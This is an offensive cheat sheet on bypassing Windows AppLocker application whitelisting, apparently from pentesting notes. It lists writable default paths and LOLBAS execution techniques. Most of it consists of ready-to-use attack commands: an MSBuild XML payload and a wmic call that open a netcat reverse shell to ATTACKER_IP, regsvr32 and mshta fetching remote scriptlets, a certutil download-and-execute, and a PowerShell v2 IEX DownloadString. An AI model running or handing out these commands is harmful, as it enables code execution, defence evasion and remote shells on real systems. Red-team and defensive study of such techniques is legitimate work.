AppLocker Bypass

Check AppLocker Policy

Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

Check if Enforced

Get-AppLockerPolicy -Effective -Xml | Select-String "EnforcementMode"

Mode	Meaning
`NotConfigured`	Not active
`AuditOnly`	Logs but doesn’t block
`Enabled`	Actively blocking

Default Writable Paths

AppLocker default rules allow execution from these paths:

C:\Windows\Tasks\
C:\Windows\Temp\
C:\Windows\tracing\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\FxsTmp\
C:\Windows\System32\com\dmp\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\
C:\Windows\SysWOW64\FxsTmp\
C:\Windows\SysWOW64\com\dmp\
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\

Find Writable + Executable Paths

Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Tasks\test.exe -User Everyone

icacls C:\Windows\Tasks
icacls C:\Windows\Temp
icacls C:\Windows\tracing

Copy payload to writable path and execute.

LOLBAS (Living Off the Land)

Signed Microsoft binaries that can execute code.

https://lolbas-project.github.io/

MSBuild

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

payload.xml:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <Exec Command="cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"/>
  </Target>
</Project>

InstallUtil

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

Regsvr32

regsvr32 /s /n /u /i:http://ATTACKER_IP/payload.sct scrobj.dll

MSHTA

mshta http://ATTACKER_IP/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c whoami"", 0:close")

Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").Run("cmd /c whoami")

WMIC

wmic process call create "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

CertUtil

certutil -urlcache -split -f http://ATTACKER_IP/shell.exe C:\Windows\Tasks\shell.exe
C:\Windows\Tasks\shell.exe

Alternate Execution Methods

PowerShell Constrained Language Mode Bypass

Check mode:

$ExecutionContext.SessionState.LanguageMode

If ConstrainedLanguage:

# PowerShell v2 (if available)
powershell -version 2 -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

DLL Execution

AppLocker may not block DLLs (not enabled by default):

rundll32.exe shell.dll,EntryPoint

Script Rules Bypass

If only .ps1 blocked, use .bat or .vbs:

cscript payload.vbs
wscript payload.js

Quick Reference

Technique	Binary
MSBuild	`Microsoft.NET\...\MSBuild.exe`
InstallUtil	`Microsoft.NET\...\InstallUtil.exe`
Regsvr32	`regsvr32.exe`
MSHTA	`mshta.exe`
Rundll32	`rundll32.exe`
WMIC	`wmic.exe`
CertUtil	`certutil.exe`
Writable paths	`C:\Windows\Tasks\`, `C:\Windows\Temp\`

Documentation Index

​Check AppLocker Policy

​Check if Enforced

​Default Writable Paths

​Find Writable + Executable Paths

​LOLBAS (Living Off the Land)

​MSBuild

​InstallUtil

​Regsvr32

​MSHTA

​Rundll32

​WMIC

​CertUtil

​Alternate Execution Methods

​PowerShell Constrained Language Mode Bypass

​DLL Execution

​Script Rules Bypass

​Quick Reference